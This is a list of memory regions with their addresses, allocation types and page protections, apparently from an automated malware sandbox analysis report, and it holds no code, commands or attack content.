25CF0000
|
trusted library allocation
|
page read and write
|
||
|
1FA3287B000
|
heap
|
page read and write
|
||
|
7A32000
|
heap
|
page read and write
|
||
|
2600C000
|
stack
|
page read and write
|
||
|
1FA32861000
|
heap
|
page read and write
|
||
|
8240000
|
trusted library allocation
|
page execute and read and write
|
||
|
7A19000
|
heap
|
page read and write
|
||
|
24B6C6A4000
|
heap
|
page read and write
|
||
|
24A41000
|
trusted library allocation
|
page read and write
|
||
|
7A92000
|
heap
|
page read and write
|
||
|
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
|
22BD0000
|
direct allocation
|
page read and write
|
||
|
30EF000
|
stack
|
page read and write
|
||
|
24A69000
|
trusted library allocation
|
page read and write
|
||
|
24B5474D000
|
trusted library allocation
|
page read and write
|
||
|
7A35000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
23A79000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
B1D3F3E000
|
stack
|
page read and write
|
||
|
1FA30BCC000
|
heap
|
page read and write
|
||
|
235E0000
|
remote allocation
|
page read and write
|
||
|
7FB0000
|
heap
|
page read and write
|
||
|
1FA3286B000
|
heap
|
page read and write
|
||
|
7FFAAC590000
|
trusted library allocation
|
page read and write
|
||
|
24B6C883000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC580000
|
trusted library allocation
|
page read and write
|
||
|
24B6CAA0000
|
heap
|
page read and write
|
||
|
24B526B4000
|
heap
|
page read and write
|
||
|
B1D403E000
|
stack
|
page read and write
|
||
|
24B6C724000
|
heap
|
page read and write
|
||
|
2365F000
|
stack
|
page read and write
|
||
|
1D496100000
|
heap
|
page read and write
|
||
|
7250000
|
trusted library allocation
|
page read and write
|
||
|
25D50000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6F0000
|
trusted library allocation
|
page read and write
|
||
|
C110000
|
direct allocation
|
page execute and read and write
|
||
|
7E90000
|
trusted library allocation
|
page read and write
|
||
|
25D90000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
1FA329A8000
|
heap
|
page read and write
|
||
|
22BB0000
|
direct allocation
|
page read and write
|
||
|
7FFB1E3C2000
|
unkown
|
page readonly
|
||
|
24B642D0000
|
trusted library allocation
|
page read and write
|
||
|
239FE000
|
stack
|
page read and write
|
||
|
2620C000
|
stack
|
page read and write
|
||
|
7260000
|
trusted library allocation
|
page read and write
|
||
|
25D20000
|
trusted library allocation
|
page read and write
|
||
|
24B6C88E000
|
heap
|
page read and write
|
||
|
25A61000
|
heap
|
page read and write
|
||
|
1FA3288D000
|
heap
|
page read and write
|
||
|
24B6C8C0000
|
heap
|
page read and write
|
||
|
23830000
|
trusted library allocation
|
page read and write
|
||
|
2EE8000
|
heap
|
page read and write
|
||
|
25C5C000
|
stack
|
page read and write
|
||
|
7FA0000
|
heap
|
page read and write
|
||
|
22C80000
|
direct allocation
|
page read and write
|
||
|
2FAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2393E000
|
stack
|
page read and write
|
||
|
25D20000
|
trusted library allocation
|
page read and write
|
||
|
26ED000
|
stack
|
page read and write
|
||
|
25CA6000
|
trusted library allocation
|
page read and write
|
||
|
7970000
|
heap
|
page read and write
|
||
|
7FFAAC3E4000
|
trusted library allocation
|
page read and write
|
||
|
7E60000
|
direct allocation
|
page read and write
|
||
|
25C99000
|
stack
|
page read and write
|
||
|
25D20000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC680000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
6EBF0000
|
unkown
|
page readonly
|
||
|
2618D000
|
stack
|
page read and write
|
||
|
736E000
|
stack
|
page read and write
|
||
|
25CA0000
|
trusted library allocation
|
page read and write
|
||
|
23770000
|
trusted library allocation
|
page read and write
|
||
|
6FF0000
|
heap
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
2BA9000
|
heap
|
page read and write
|
||
|
73E0000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
84D0000
|
direct allocation
|
page read and write
|
||
|
236DB000
|
stack
|
page read and write
|
||
|
1FA32864000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
7E50000
|
direct allocation
|
page read and write
|
||
|
7FFB1E3B6000
|
unkown
|
page readonly
|
||
|
6F9E000
|
stack
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
24B54B0B000
|
trusted library allocation
|
page read and write
|
||
|
27EE000
|
stack
|
page read and write
|
||
|
C69C2FD000
|
stack
|
page read and write
|
||
|
70F0000
|
trusted library allocation
|
page read and write
|
||
|
7280000
|
trusted library allocation
|
page read and write
|
||
|
2A00000
|
heap
|
page read and write
|
||
|
6B70000
|
direct allocation
|
page read and write
|
||
|
B1D40BB000
|
stack
|
page read and write
|
||
|
7FFAAC4C6000
|
trusted library allocation
|
page execute and read and write
|
||
|
6EC0D000
|
unkown
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
1FA3297B000
|
heap
|
page read and write
|
||
|
23820000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
1FA30BF5000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
B1D4B0D000
|
stack
|
page read and write
|
||
|
2A3E000
|
stack
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
846D000
|
stack
|
page read and write
|
||
|
24B52620000
|
trusted library allocation
|
page read and write
|
||
|
234BE000
|
stack
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
1FA30BFB000
|
heap
|
page read and write
|
||
|
23830000
|
trusted library allocation
|
page read and write
|
||
|
7480000
|
trusted library allocation
|
page read and write
|
||
|
23A10000
|
trusted library allocation
|
page read and write
|
||
|
2309E000
|
stack
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
7430000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
84E0000
|
direct allocation
|
page read and write
|
||
|
2F94000
|
trusted library allocation
|
page read and write
|
||
|
6EC0D000
|
unkown
|
page read and write
|
||
|
1FA32870000
|
heap
|
page read and write
|
||
|
25CE0000
|
trusted library allocation
|
page read and write
|
||
|
25D80000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC660000
|
trusted library allocation
|
page read and write
|
||
|
23830000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5F0000
|
trusted library allocation
|
page read and write
|
||
|
690E000
|
stack
|
page read and write
|
||
|
7FE7000
|
heap
|
page read and write
|
||
|
7A94000
|
heap
|
page read and write
|
||
|
23A00000
|
trusted library allocation
|
page read and write
|
||
|
7975000
|
heap
|
page read and write
|
||
|
25CAB000
|
trusted library allocation
|
page read and write
|
||
|
23A00000
|
trusted library allocation
|
page read and write
|
||
|
24B6C863000
|
heap
|
page read and write
|
||
|
2DDE000
|
stack
|
page read and write
|
||
|
23850000
|
heap
|
page read and write
|
||
|
24B540D0000
|
heap
|
page read and write
|
||
|
25CE0000
|
trusted library allocation
|
page read and write
|
||
|
22C30000
|
direct allocation
|
page read and write
|
||
|
7490000
|
trusted library allocation
|
page read and write
|
||
|
70E2000
|
heap
|
page read and write
|
||
|
5930000
|
remote allocation
|
page execute and read and write
|
||
|
22FF0000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
24B56079000
|
trusted library allocation
|
page read and write
|
||
|
2339F000
|
stack
|
page read and write
|
||
|
B1D3D3E000
|
stack
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
22BC0000
|
direct allocation
|
page read and write
|
||
|
23A20000
|
trusted library allocation
|
page read and write
|
||
|
B1D397E000
|
stack
|
page read and write
|
||
|
23775000
|
trusted library allocation
|
page read and write
|
||
|
24B52751000
|
heap
|
page read and write
|
||
|
1FA3298A000
|
heap
|
page read and write
|
||
|
22C60000
|
direct allocation
|
page read and write
|
||
|
7460000
|
trusted library allocation
|
page read and write
|
||
|
2D80000
|
trusted library allocation
|
page read and write
|
||
|
25D70000
|
trusted library allocation
|
page read and write
|
||
|
24B5266D000
|
heap
|
page read and write
|
||
|
23690000
|
direct allocation
|
page read and write
|
||
|
4EE3000
|
trusted library allocation
|
page read and write
|
||
|
25D80000
|
trusted library allocation
|
page read and write
|
||
|
7400000
|
trusted library allocation
|
page read and write
|
||
|
23830000
|
trusted library allocation
|
page read and write
|
||
|
2B3C000
|
heap
|
page read and write
|
||
|
1D496170000
|
heap
|
page read and write
|
||
|
23840000
|
trusted library allocation
|
page read and write
|
||
|
24B53FBC000
|
heap
|
page read and write
|
||
|
1FA30B71000
|
heap
|
page read and write
|
||
|
83EC000
|
stack
|
page read and write
|
||
|
2B00000
|
trusted library allocation
|
page read and write
|
||
|
7270000
|
trusted library allocation
|
page read and write
|
||
|
2C72000
|
heap
|
page read and write
|
||
|
1FA30B65000
|
heap
|
page read and write
|
||
|
6C4A000
|
stack
|
page read and write
|
||
|
2A30000
|
heap
|
page read and write
|
||
|
8480000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC3ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
24B54217000
|
heap
|
page execute and read and write
|
||
|
7E70000
|
heap
|
page read and write
|
||
|
25CF1000
|
trusted library allocation
|
page read and write
|
||
|
23460000
|
direct allocation
|
page read and write
|
||
|
7C0E000
|
stack
|
page read and write
|
There are 835 hidden memdumps, click here to show them.